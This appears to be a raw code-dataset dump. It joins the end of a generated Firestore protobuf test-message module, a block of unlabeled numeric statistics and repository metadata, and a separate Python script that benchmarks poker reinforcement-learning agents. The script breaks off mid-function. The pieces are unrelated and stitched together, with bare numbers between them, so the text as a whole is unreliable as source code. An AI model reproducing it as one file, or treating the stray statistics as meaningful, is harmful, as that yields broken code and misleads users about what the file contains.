DESCRIPTOR.message_types_by_name["GetTest"] = _GETTEST
DESCRIPTOR.message_types_by_name["CreateTest"] = _CREATETEST
DESCRIPTOR.message_types_by_name["SetTest"] = _SETTEST
DESCRIPTOR.message_types_by_name["UpdateTest"] = _UPDATETEST
DESCRIPTOR.message_types_by_name["UpdatePathsTest"] = _UPDATEPATHSTEST
DESCRIPTOR.message_types_by_name["DeleteTest"] = _DELETETEST
DESCRIPTOR.message_types_by_name["SetOption"] = _SETOPTION
DESCRIPTOR.message_types_by_name["QueryTest"] = _QUERYTEST
DESCRIPTOR.message_types_by_name["Clause"] = _CLAUSE
DESCRIPTOR.message_types_by_name["Select"] = _SELECT
DESCRIPTOR.message_types_by_name["Where"] = _WHERE
DESCRIPTOR.message_types_by_name["OrderBy"] = _ORDERBY
DESCRIPTOR.message_types_by_name["Cursor"] = _CURSOR
DESCRIPTOR.message_types_by_name["DocSnapshot"] = _DOCSNAPSHOT
DESCRIPTOR.message_types_by_name["FieldPath"] = _FIELDPATH
DESCRIPTOR.message_types_by_name["ListenTest"] = _LISTENTEST
DESCRIPTOR.message_types_by_name["Snapshot"] = _SNAPSHOT
DESCRIPTOR.message_types_by_name["DocChange"] = _DOCCHANGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TestFile = _reflection.GeneratedProtocolMessageType(
"TestFile",
(_message.Message,),
dict(
DESCRIPTOR=_TESTFILE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.TestFile)
),
)
_sym_db.RegisterMessage(TestFile)
Test = _reflection.GeneratedProtocolMessageType(
"Test",
(_message.Message,),
dict(
DESCRIPTOR=_TEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Test)
),
)
_sym_db.RegisterMessage(Test)
GetTest = _reflection.GeneratedProtocolMessageType(
"GetTest",
(_message.Message,),
dict(
DESCRIPTOR=_GETTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.GetTest)
),
)
_sym_db.RegisterMessage(GetTest)
CreateTest = _reflection.GeneratedProtocolMessageType(
"CreateTest",
(_message.Message,),
dict(
DESCRIPTOR=_CREATETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.CreateTest)
),
)
_sym_db.RegisterMessage(CreateTest)
SetTest = _reflection.GeneratedProtocolMessageType(
"SetTest",
(_message.Message,),
dict(
DESCRIPTOR=_SETTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.SetTest)
),
)
_sym_db.RegisterMessage(SetTest)
UpdateTest = _reflection.GeneratedProtocolMessageType(
"UpdateTest",
(_message.Message,),
dict(
DESCRIPTOR=_UPDATETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.UpdateTest)
),
)
_sym_db.RegisterMessage(UpdateTest)
UpdatePathsTest = _reflection.GeneratedProtocolMessageType(
"UpdatePathsTest",
(_message.Message,),
dict(
DESCRIPTOR=_UPDATEPATHSTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.UpdatePathsTest)
),
)
_sym_db.RegisterMessage(UpdatePathsTest)
DeleteTest = _reflection.GeneratedProtocolMessageType(
"DeleteTest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETETEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DeleteTest)
),
)
_sym_db.RegisterMessage(DeleteTest)
SetOption = _reflection.GeneratedProtocolMessageType(
"SetOption",
(_message.Message,),
dict(
DESCRIPTOR=_SETOPTION,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.SetOption)
),
)
_sym_db.RegisterMessage(SetOption)
QueryTest = _reflection.GeneratedProtocolMessageType(
"QueryTest",
(_message.Message,),
dict(
DESCRIPTOR=_QUERYTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.QueryTest)
),
)
_sym_db.RegisterMessage(QueryTest)
Clause = _reflection.GeneratedProtocolMessageType(
"Clause",
(_message.Message,),
dict(
DESCRIPTOR=_CLAUSE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Clause)
),
)
_sym_db.RegisterMessage(Clause)
Select = _reflection.GeneratedProtocolMessageType(
"Select",
(_message.Message,),
dict(
DESCRIPTOR=_SELECT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Select)
),
)
_sym_db.RegisterMessage(Select)
Where = _reflection.GeneratedProtocolMessageType(
"Where",
(_message.Message,),
dict(
DESCRIPTOR=_WHERE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Where)
),
)
_sym_db.RegisterMessage(Where)
OrderBy = _reflection.GeneratedProtocolMessageType(
"OrderBy",
(_message.Message,),
dict(
DESCRIPTOR=_ORDERBY,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.OrderBy)
),
)
_sym_db.RegisterMessage(OrderBy)
Cursor = _reflection.GeneratedProtocolMessageType(
"Cursor",
(_message.Message,),
dict(
DESCRIPTOR=_CURSOR,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Cursor)
),
)
_sym_db.RegisterMessage(Cursor)
DocSnapshot = _reflection.GeneratedProtocolMessageType(
"DocSnapshot",
(_message.Message,),
dict(
DESCRIPTOR=_DOCSNAPSHOT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DocSnapshot)
),
)
_sym_db.RegisterMessage(DocSnapshot)
FieldPath = _reflection.GeneratedProtocolMessageType(
"FieldPath",
(_message.Message,),
dict(
DESCRIPTOR=_FIELDPATH,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.FieldPath)
),
)
_sym_db.RegisterMessage(FieldPath)
ListenTest = _reflection.GeneratedProtocolMessageType(
"ListenTest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTENTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.ListenTest)
),
)
_sym_db.RegisterMessage(ListenTest)
Snapshot = _reflection.GeneratedProtocolMessageType(
"Snapshot",
(_message.Message,),
dict(
DESCRIPTOR=_SNAPSHOT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Snapshot)
),
)
_sym_db.RegisterMessage(Snapshot)
DocChange = _reflection.GeneratedProtocolMessageType(
"DocChange",
(_message.Message,),
dict(
DESCRIPTOR=_DOCCHANGE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DocChange)
),
)
_sym_db.RegisterMessage(DocChange)
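# --- Illustrative note (not emitted by protoc; a hedged sketch only) ---
# The classes registered above behave like ordinary protobuf messages, so a
# conformance test case could, for example, be built and round-tripped as:
#   clause = Clause(select=Select(fields=[FieldPath(field=["a", "b"])]))
#   data = clause.SerializeToString()
#   assert Clause.FromString(data).select.fields[0].field == ["a", "b"]
# Field names here mirror the descriptors defined earlier in this module.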
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(
descriptor_pb2.FileOptions(),
_b(
'\n)com.google.cloud.conformance.firestore.v1B\016TestDefinition\252\002"Google.Cloud.Firestore.Tests.Proto\312\002(Google\\Cloud\\Firestore\\Tests\\Conformance'
),
)
# @@protoc_insertion_point(module_scope)
| 32.515165
| 5,821
| 0.606424
| 7,814
| 71,826
| 5.263117
| 0.046967
| 0.047853
| 0.08705
| 0.08987
| 0.808491
| 0.770291
| 0.753903
| 0.732554
| 0.665054
| 0.649565
| 0
| 0.040892
| 0.28569
| 71,826
| 2,208
| 5,822
| 32.529891
| 0.760691
| 0.024601
| 0
| 0.761724
| 1
| 0.007579
| 0.162664
| 0.130965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005211
| 0
| 0.005211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89c94b33df9f614d0fedb9247f40688412b91cc6
| 66
|
py
|
Python
|
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
from measurement import onewire
from measurement import ds18b20
| 13.2
| 31
| 0.848485
| 8
| 66
| 7
| 0.625
| 0.535714
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.151515
| 66
| 4
| 32
| 16.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89d6b4bc5b500728a1f2e6ebd693598faa7959b8
| 65
|
py
|
Python
|
libs/data.py
|
billydevyt/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 6
|
2020-11-07T16:46:18.000Z
|
2021-01-03T11:52:39.000Z
|
libs/data.py
|
billyeatcookies/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 3
|
2020-11-30T01:52:41.000Z
|
2021-01-03T11:53:18.000Z
|
libs/data.py
|
billyeatcookies/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 7
|
2021-04-17T07:27:58.000Z
|
2021-08-31T15:21:42.000Z
|
import discord
def file():
return discord.File('output.png')
| 16.25
| 37
| 0.707692
| 9
| 65
| 5.111111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 65
| 4
| 37
| 16.25
| 0.836364
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d6598b09517b75a15a2930ccad330b0444a210cc
| 25,175
|
py
|
Python
|
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | 3
|
2020-08-30T19:27:02.000Z
|
2020-08-31T23:29:15.000Z
|
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | null | null | null |
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Untitled49.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1yzdaM-t5sXo8yESVxjaN5DnYaUhyONxF
"""
import numpy as np
import pandas as pd
import copy
from mod_poker_5 import *
from mod_fe import *
from mod_agents import *
def bench(a , b=Agent_Simple_Rational(), debug=False):
winners = []
for i in range(100):
# print(i)
poker = Poker_5(debug=debug,single_hand=False)
log = ""
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
# print(poker.game_winner)
winners.append(poker.game_winner)
win_per_Azero = 1 - np.count_nonzero(winners)/len(winners)
return win_per_Azero
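# Hedged usage sketch (agent class names are assumed to come from the
# `from mod_agents import *` above; they are not defined in this file):
#   win_rate = bench(Agent_Random(), b=Agent_Simple_Rational())
#   print('agent 0 win rate vs. rational baseline:', win_rate)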
def bench_AV(a , b=Agent_Simple_Rational(), debug=False):
winners = []
for i in range(100):
# print(i)
poker = Poker_5(debug=debug,single_hand=False)
log = ""
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
# print(poker.game_winner)
winners.append(poker.game_winner)
win_per_Azero = 1 - np.count_nonzero(winners)/len(winners)
return win_per_Azero
def bench_hands(a , b=Agent_Simple_Rational()):
winners = []
for i in range(1000):
# print(i)
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
return win_per_Azero
def bench_hands_AV(a , b=Agent_Simple_Rational()):
winners = []
for i in range(1000):
# print(i)
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
return win_per_Azero
def comp_test(agent_a):
winners = []
a= agent_a
b= Agent_Call_Any()
c= Agent_Raise_Any()
d= Agent_Random()
e= Agent_Simple_Rational()
f= Agent_Simple_Equity()
g= Agent_Allin_Any()
agent_a.epsilon = 0
print(agent_a.temp, 'atemp')
Agents=[a,b,c,d,e,f,g]
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(100):
poker = Poker_5()
log = ""
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
###############################
def comp_test_AV(agent_a):
winners = []
a= agent_a
b= Agent_Call_Any()
c= Agent_Raise_Any()
d= Agent_Random()
e= Agent_Simple_Rational()
f= Agent_Simple_Equity()
g= Agent_Allin_Any()
agent_a.epsilon = 0
print(agent_a.temp, 'atemp')
Agents=[a,b,c,d,e,f,g]
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(100):
poker = Poker_5()
log = ""
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
####
def tornument(Agents):
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
for agent in Agents:
agent.epsilon = 0
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
try:
if abs(int(a.name) - int(b.name)) == 1 :
continue
except:
pass
winners = []
for i in range(40):
poker = Poker_5()
log = ""
steps = 0
while poker.game_ended == 0:
steps+=1
if steps>1000:
poker.game_winner = np.argmax(poker.obs['stacks'])
print('breaking!')
break
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
###############################
def compare(a, recents):
winners = []
Agents=[a] + recents
Agents_Array = 0.5*np.ones((1, len(Agents)))
for agent in Agents:
agent.epsilon = 0
agent.temp= 0.01
columns, index = [],[a.name]
for agent in Agents:
columns.append(agent.name)
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(20):
poker = Poker_5()
log = ""
steps = 0
while poker.game_ended == 0:
steps+=1
if steps>1000:
poker.game_winner = np.argmax(poker.obs['stacks'])
print('breaking!')
break
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[0].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[0,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
##########
def analyze(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
winners = []
base = np.zeros((1,7))
for i in range(1000):
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
base[0, np.nonzero(act_get)] += 1
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
base = base/np.sum(base) * 100
return win_per_Azero , base
def analyze_probs(a , b=Agent_Simple_Rational(), pokers = None):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
if pokers is None:
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
else:
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
def analyze_probs_fast(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
acts_2 = np.zeros((1,7))
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_2 = np.vstack([acts_2, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return np.mean((acts_1 - acts_2)**2)
##################
def analyze_AV(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
winners = []
base = np.zeros((1,7))
for i in range(1000):
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
base[0, np.nonzero(act_get)] += 1
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
